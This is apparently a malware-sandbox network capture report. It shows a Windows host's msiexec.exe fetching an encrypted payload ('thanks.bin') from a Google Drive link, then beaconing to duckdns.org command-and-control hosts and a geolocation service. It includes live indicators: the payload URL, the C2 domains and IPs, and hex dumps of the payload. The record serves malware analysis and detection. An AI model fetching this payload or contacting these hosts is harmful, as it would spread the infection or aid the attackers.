                                                Dec 13, 2024 08:50:39.585079908 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.585630894 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.585798979 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.585808039 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.586055994 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.586488008 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.586678982 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.586687088 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.586846113 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.587385893 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.587559938 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.587568045 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.587745905 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.588239908 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.588525057 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.588534117 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.588712931 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.589095116 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.589293957 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.589303017 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.589487076 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.590015888 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.590162039 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.590169907 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.590409994 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.590840101 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.591048002 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.591057062 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.591254950 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.591698885 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.591836929 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:39.591931105 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.592031956 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.592056036 CET49715443192.168.11.20108.177.122.132
                                                Dec 13, 2024 08:50:39.592062950 CET44349715108.177.122.132192.168.11.20
                                                Dec 13, 2024 08:50:48.113454103 CET497162879192.168.11.20192.169.69.26
                                                Dec 13, 2024 08:50:48.349673986 CET287949716192.169.69.26192.168.11.20
                                                Dec 13, 2024 08:50:48.349891901 CET497162879192.168.11.20192.169.69.26
                                                Dec 13, 2024 08:50:48.350111961 CET497162879192.168.11.20192.169.69.26
                                                Dec 13, 2024 08:50:48.634608030 CET287949716192.169.69.26192.168.11.20
                                                Dec 13, 2024 08:50:48.635799885 CET497172889192.168.11.20192.169.69.26
                                                Dec 13, 2024 08:50:48.854010105 CET288949717192.169.69.26192.168.11.20
                                                Dec 13, 2024 08:50:48.854183912 CET497172889192.168.11.20192.169.69.26
                                                Dec 13, 2024 08:50:48.857003927 CET497172889192.168.11.20192.169.69.26
                                                Dec 13, 2024 08:50:49.131221056 CET288949717192.169.69.26192.168.11.20
                                                Dec 13, 2024 08:50:49.282737970 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:49.555067062 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:50:49.555255890 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:49.555505991 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:49.800765038 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:50:49.802153111 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:50.046421051 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:50:50.095329046 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:50.166012049 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:50:50.371707916 CET8049719178.237.33.50192.168.11.20
                                                Dec 13, 2024 08:50:50.371921062 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:50:50.372051954 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:50:50.582201004 CET8049719178.237.33.50192.168.11.20
                                                Dec 13, 2024 08:50:50.582431078 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:50:50.610426903 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:51.204408884 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:51.581801891 CET8049719178.237.33.50192.168.11.20
                                                Dec 13, 2024 08:50:51.581983089 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:50:51.813699007 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:50:52.520796061 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:50:52.521447897 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:50:59.768048048 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:50:59.769653082 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:51:00.388771057 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:51:00.388906002 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:51:01.505249977 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:51:01.505451918 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:51:01.631536961 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:51:29.945658922 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:51:29.947339058 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:51:30.830185890 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:51:31.678822994 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:52:00.088613987 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:52:00.089692116 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:52:00.382064104 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:52:25.043322086 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:52:25.574438095 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:52:26.636672974 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:52:28.745642900 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:52:30.274105072 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:52:30.276132107 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:52:30.580018044 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:52:32.963421106 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:52:41.383502007 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:52:58.223532915 CET4971980192.168.11.20178.237.33.50
                                                Dec 13, 2024 08:53:00.444282055 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:53:00.445787907 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:53:00.739780903 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:53:30.593415976 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:53:30.594583035 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:53:30.886915922 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:54:00.737374067 CET287949718172.111.244.113192.168.11.20
                                                Dec 13, 2024 08:54:00.738496065 CET497182879192.168.11.20172.111.244.113
                                                Dec 13, 2024 08:54:01.136770010 CET287949718172.111.244.113192.168.11.20
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 13, 2024 08:50:35.052189112 CET5105953192.168.11.201.1.1.1
                                                Dec 13, 2024 08:50:35.166699886 CET53510591.1.1.1192.168.11.20
                                                Dec 13, 2024 08:50:35.712951899 CET6083953192.168.11.201.1.1.1
                                                Dec 13, 2024 08:50:35.829119921 CET53608391.1.1.1192.168.11.20
                                                Dec 13, 2024 08:50:47.963767052 CET5122353192.168.11.201.1.1.1
                                                Dec 13, 2024 08:50:48.112231016 CET53512231.1.1.1192.168.11.20
                                                Dec 13, 2024 08:50:49.131860971 CET6340053192.168.11.201.1.1.1
                                                Dec 13, 2024 08:50:49.281646013 CET53634001.1.1.1192.168.11.20
                                                Dec 13, 2024 08:50:50.049469948 CET5737053192.168.11.201.1.1.1
                                                Dec 13, 2024 08:50:50.165311098 CET53573701.1.1.1192.168.11.20
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 13, 2024 08:50:35.052189112 CET192.168.11.201.1.1.10x9cbfStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:35.712951899 CET192.168.11.201.1.1.10x1e8cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:47.963767052 CET192.168.11.201.1.1.10xcd90Standard query (0)eweo9264gtuiort.duckdns.orgA (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:49.131860971 CET192.168.11.201.1.1.10x891dStandard query (0)eweo9264gtuiorta1.duckdns.orgA (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:50.049469948 CET192.168.11.201.1.1.10x7801Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 13, 2024 08:50:35.166699886 CET1.1.1.1192.168.11.200x9cbfNo error (0)drive.google.com172.217.215.102A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:35.166699886 CET1.1.1.1192.168.11.200x9cbfNo error (0)drive.google.com172.217.215.101A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:35.166699886 CET1.1.1.1192.168.11.200x9cbfNo error (0)drive.google.com172.217.215.100A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:35.166699886 CET1.1.1.1192.168.11.200x9cbfNo error (0)drive.google.com172.217.215.139A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:35.166699886 CET1.1.1.1192.168.11.200x9cbfNo error (0)drive.google.com172.217.215.113A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:35.166699886 CET1.1.1.1192.168.11.200x9cbfNo error (0)drive.google.com172.217.215.138A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:35.829119921 CET1.1.1.1192.168.11.200x1e8cNo error (0)drive.usercontent.google.com108.177.122.132A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:48.112231016 CET1.1.1.1192.168.11.200xcd90No error (0)eweo9264gtuiort.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:49.281646013 CET1.1.1.1192.168.11.200x891dNo error (0)eweo9264gtuiorta1.duckdns.org172.111.244.113A (IP address)IN (0x0001)false
                                                Dec 13, 2024 08:50:50.165311098 CET1.1.1.1192.168.11.200x7801No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                • drive.google.com
                                                • drive.usercontent.google.com
                                                • geoplugin.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.2049719178.237.33.50805324C:\Windows\SysWOW64\msiexec.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 08:50:50.372051954 CET71OUTGET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Dec 13, 2024 08:50:50.582201004 CET1170INHTTP/1.1 200 OK
                                                date: Fri, 13 Dec 2024 07:50:50 GMT
                                                server: Apache
                                                content-length: 962
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                Data Ascii: { "geoplugin_request":"89.187.171.165", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Atlanta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"33.7485", "geoplugin_longitude":"-84.3871", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.2049714172.217.215.1024435324C:\Windows\SysWOW64\msiexec.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-13 07:50:35 UTC216OUTGET /uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                2024-12-13 07:50:35 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Fri, 13 Dec 2024 07:50:35 GMT
                                                Location: https://drive.usercontent.google.com/download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-mS-Nb623ddTLkTCfQ63sMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.11.2049715108.177.122.1324435324C:\Windows\SysWOW64\msiexec.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-13 07:50:36 UTC258OUTGET /download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                2024-12-13 07:50:38 UTC4927INHTTP/1.1 200 OK
                                                X-GUploader-UploadID: AFiumC7D81p53FruwEMC5BP-kUlmZIAO-gKXnnYqvZx_asb4oD07JG1MYp0rquLk6BF8WLat
                                                Content-Type: application/octet-stream
                                                Content-Security-Policy: sandbox
                                                Content-Security-Policy: default-src 'none'
                                                Content-Security-Policy: frame-ancestors 'none'
                                                X-Content-Security-Policy: sandbox
                                                Cross-Origin-Opener-Policy: same-origin
                                                Cross-Origin-Embedder-Policy: require-corp
                                                Cross-Origin-Resource-Policy: same-site
                                                X-Content-Type-Options: nosniff
                                                Content-Disposition: attachment; filename="thanks.bin"
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: false
                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                Accept-Ranges: bytes
                                                Content-Length: 494656
                                                Last-Modified: Tue, 22 Oct 2024 08:22:34 GMT
                                                Date: Fri, 13 Dec 2024 07:50:38 GMT
                                                Expires: Fri, 13 Dec 2024 07:50:38 GMT
                                                Cache-Control: private, max-age=0
                                                X-Goog-Hash: crc32c=sfsDdA==
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close
                                                2024-12-13 07:50:39 UTC4927INData Raw: b7 c5 65 ef c5 97 12 70 c4 41 22 41 4c 0a 8f 5b 0d 7b a4 ca 19 2d f1 5a 92 6c 87 92 d8 4a 31 77 ab c9 59 ac be 78 09 ac e3 2a c6 25 10 ef 52 c3 52 da 99 ca 42 e7 75 03 1b 7e 3c 22 86 db 68 36 46 b4 7a 25 19 b0 51 59 f0 db 85 55 47 ce a2 af d5 8f 94 06 5e 5d ba bd 58 11 40 ca f8 71 1b cf de dc ea 2c 9c c0 04 64 fc 6b 8e 42 d6 2c a5 bf da 84 d1 51 4d 83 25 13 f6 97 2c 6d 71 c2 e0 4b 57 2e 11 3b c1 f7 94 7b a5 9d 7b 2c 20 91 39 30 dc 7d 1a 72 7a 67 e1 5c 72 bb b6 e8 9e c3 21 af 31 4f 1a 03 a8 1d 1f 47 e8 93 1e 89 82 77 01 be d6 cc 7d eb 43 23 05 94 c9 e2 b9 fb c6 f0 bc 20 25 58 ef c1 c6 c2 18 05 27 dd 21 9e a4 48 ed 29 d4 b9 50 45 4e d5 18 04 70 fe 74 36 47 8d 98 55 7b 0a 19 97 3e fe 08 e9 42 d0 8f 05 8b b3 de e1 4d 63 86 af bc e5 39 aa 66 c7 8c ce d7 ce cc
                                                Data Ascii: epA"AL[{-ZlJ1wYx*%RRBu~<"h6Fz%QYUG^]X@q,dkB,QM%,mqKW.;{{, 90}rzg\r!1OGw}C# %X'!H)PENpt6GU{>BMc9f
                                                2024-12-13 07:50:39 UTC4842INData Raw: 19 74 4f 15 7a f9 ce 0f ad df 06 78 4e 05 15 ef e5 67 66 29 3b b1 2a 5d f0 87 ca 8d 81 08 aa 21 5d f5 ca db 42 8b bb 0d 97 ea a6 9e 73 48 f8 85 03 1f 4e 34 c9 d5 dd 23 75 b2 65 9d 83 2f ec fe e7 2b c2 19 72 40 83 4b 3e 2a 07 da 4f 71 3c d8 29 a3 6e a0 5d c7 d3 13 95 0d ff f2 51 85 62 9f 4d 67 44 07 7d 8f ee fd 34 97 20 a0 3e 2a e4 b2 8a dd ef 37 2c 82 b2 4b c3 68 38 c1 0e d9 58 65 4a 78 5e 49 af 92 aa 38 ab 62 30 d0 4f a2 3e 6f 3a 37 aa e4 c6 02 98 03 96 55 8f e8 68 5a 3c a6 be 06 c5 87 84 0f 20 d4 ae a5 e4 25 36 dc 42 92 c7 be 35 4b 0c 92 42 11 93 47 34 12 b6 06 d3 72 4b ec 31 0f 56 3b ee c6 46 6e ea a1 b2 ea 63 f2 a5 66 a2 2a 5a ca ea 2c af b2 89 f4 6d 01 7d 4c 48 87 f9 88 9f 7d 41 a2 f9 a3 98 af d3 3a d2 6f 90 a1 82 97 d9 d0 8c 62 fd b9 1d 4d c3 83 92
                                                Data Ascii: tOzxNgf);*]!]BsHN4#ue/+r@K>*Oq<)n]QbMgD}4 >*7,Kh8XeJx^I8b0O>o:7UhZ< %6B5KBG4rK1V;Fncf*Z,m}LH}A:obM
                                                2024-12-13 07:50:39 UTC1255INData Raw: 48 25 ae b6 a5 d3 ce 09 d7 7b 7b e1 21 61 55 19 ef d8 5d f2 f2 97 70 a0 21 a2 a1 9d 6c 5c 43 a4 9d a3 b7 ad 94 2a 7c 04 cf b4 48 05 42 ec 5b 03 bf 4d de 73 27 2b 97 2b 7c ef 0f c0 39 00 79 93 ff 46 57 2b 70 b5 91 a5 df 83 32 4a 4a b6 1d 4a 07 21 91 c2 0c eb 6d 87 24 25 21 00 7c 2f e6 8f 8a 74 07 6a 27 ea d8 59 3d 33 85 14 93 4c 12 c5 99 96 15 90 fa 97 a4 6c f4 b8 61 d4 91 fc 75 51 1c 7e 6a aa 47 61 4a b0 93 70 6b 5f 0e d6 74 55 4a ef bf 35 92 71 71 cf 55 12 02 e6 73 3f fb 9b 88 4f 86 aa d4 d2 5a 40 83 d4 5a 9f a5 1f d5 ec 09 1c ea 33 ab c7 e0 18 0f 66 20 c4 29 d0 72 49 7b ae 06 44 fd 3b 75 63 6a 79 1b 89 c6 e0 56 da ec 29 af b3 8b bb 25 c1 12 e4 b6 8e 97 99 95 d6 4c 3a 04 a1 95 b3 9c 76 3f 55 e6 71 32 70 53 5c e9 e2 ec 70 2a a1 ea ad 6c 37 dc 1d de 55 83
                                                Data Ascii: H%{{!aU]p!l\C*|HB[Ms'++|9yFW+p2JJJ!m$%!|/tj'Y=3LlauQ~jGaJpk_tUJ5qqUs?OZ@Z3f )rI{D;ucjyV)%L:v?Uq2pS\p*l7U
                                                2024-12-13 07:50:39 UTC1255INData Raw: 9c 91 b2 f6 00 ec 28 ac 55 70 a7 5b 5e 66 fc 55 95 a4 e9 16 e4 72 22 87 69 56 da 79 e6 01 8d 01 14 38 2c ec 62 d8 c0 ef bf 7f 9f 3a 9b 49 75 77 90 c2 60 3b 68 e3 7b da 49 dc 38 b5 a7 e7 87 bd 4a e0 76 83 77 3f c5 1d 4b 7c d7 0c 00 0a ed 04 2e cd 2f 63 99 ff f3 de 0d ac 1e 68 41 aa 86 98 a0 44 59 d0 d2 a2 4d 8f d6 eb fb e4 04 76 73 a4 e4 65 bd 39 12 12 2f f7 74 d3 be 69 82 28 eb b0 c4 e1 d2 0a a0 b9 a7 5f b3 e3 af 3c d0 3d 24 c5 eb 67 d8 35 d2 e8 a5 fc ab fb 8d c1 56 72 5b 22 fe 4a 2a 35 5b b2 29 62 0a fa 10 bb 69 1e 3a e4 7e a5 c9 99 63 cd 08 fb fb 86 04 9c da f9 d8 ed 31 02 a0 c4 9a 2b 89 89 6b d8 a6 ea c7 a5 dd fa 33 91 8d f9 4b e5 3c 5d 23 ec ad 1b c7 4a eb ae b0 33 57 09 c8 bd d7 59 ba 65 da 1b f8 7a e4 5d fa b1 17 2e eb 07 f5 a3 2d de c1 d1 8c a9 a0
                                                Data Ascii: (Up[^fUr"iVy8,b:Iuw`;h{I8Jvw?K|./chADYMvse9/ti(_<=$g5Vr["J*5[)bi:~c1+k3K<]#J3WYez].-
                                                2024-12-13 07:50:39 UTC1255INData Raw: ad 45 91 59 3d 75 1b 69 de fb 0a 3d de 60 51 61 c3 c7 ac 1c 95 8f f0 53 81 60 af d1 b1 8f 60 b1 d0 f6 f0 90 56 e0 0f 87 45 2b 14 40 1f 9c c7 e0 51 eb f2 88 d6 88 ca 17 46 64 d8 f8 44 bf ff 68 c2 33 be 73 b0 b5 9d 36 30 76 de 69 39 af 98 dd 6c 2e 6d d9 97 cc 7d fb b7 3b dd 76 b6 98 d1 a7 69 6f 2a 2e 29 d9 22 0f fc 83 69 96 89 31 b8 2b 4e d9 43 ce f2 91 cd 74 51 33 aa 3f df ab 5e bf 62 b5 e2 93 b9 53 dd b1 17 d0 83 5d cf 90 1f 39 b0 99 51 91 fb ff 3d d0 a8 18 97 28 28 eb 65 41 e3 d2 fc f7 ff 10 30 8d 11 2c 7e 2d 3a 39 e4 e6 40 11 82 da 7f 39 04 76 47 78 fa 87 32 5c 4b ae bc e1 a6 7e 87 9c 9a 05 3e 46 2f a5 08 93 2e 3a 0f a7 5f 2b 31 e8 61 ad 76 f1 46 d4 63 2c 87 a5 ec ea a2 e0 23 71 28 95 74 df fc 34 78 55 bd e5 be 2d 93 f5 e4 b8 cf 97 ed b5 14 31 dd 20 17
                                                Data Ascii: EY=ui=`QaS``VE+@QFdDh3s60vi9l.m};vio*.)"i1+NCtQ3?^bS]9Q=((eA0,~-:9@9vGx2\K~>F/.:_+1avFc,#q(t4xU-1
                                                2024-12-13 07:50:39 UTC1255INData Raw: ed 33 23 6e 1f f5 60 ff 78 79 8d 43 e8 7c f5 4d 17 42 28 ed 81 19 c6 d0 e9 d0 b7 8f 9c 7d b1 77 f2 76 1c 08 c7 59 20 bd d9 a5 0b 3f cc 73 c8 ef 9b 43 cc 7f ad c3 ab 7a 75 ef da 8b 4e ba 49 71 e5 27 ad e7 18 7f 03 f6 cb 1a c2 d0 ef 8d d6 35 2f 90 7d 90 04 b2 06 b8 d1 92 5f c5 a3 6c 40 fa 86 22 9a d8 97 e0 89 b2 27 d6 e7 a8 6e e9 c6 20 22 db 6a 30 c5 51 b0 cd 2c 3b 93 f6 be 74 07 b8 ed 8f 9f c3 57 5e f4 3f 0b f4 48 a0 cb 18 f9 28 5c 64 08 b5 b8 90 d9 47 6b b7 7d 3d 27 01 aa d3 f7 88 79 3c b7 91 ce de b8 0c 37 c8 82 57 18 b9 40 36 3c da 6b 5d b8 28 7b f3 97 c9 40 e7 2b 49 dd 53 55 43 2f 68 02 7b c5 84 00 84 9f 78 b4 dd 88 f0 48 97 71 30 5a e6 fa e0 74 0b a8 99 e4 33 e2 96 f9 1a f0 f7 c8 4b be 8f 86 c1 d1 65 4f ff 21 7b a1 3f 3d 23 29 44 ce e0 cb 07 78 4e ae
                                                Data Ascii: 3#n`xyC|MB(}wvY ?sCzuNIq'5/}_l@"'n "j0Q,;tW^?H(\dGk}='y<7W@6<k]({@+ISUC/h{xHq0Zt3KeO!{?=#)DxN
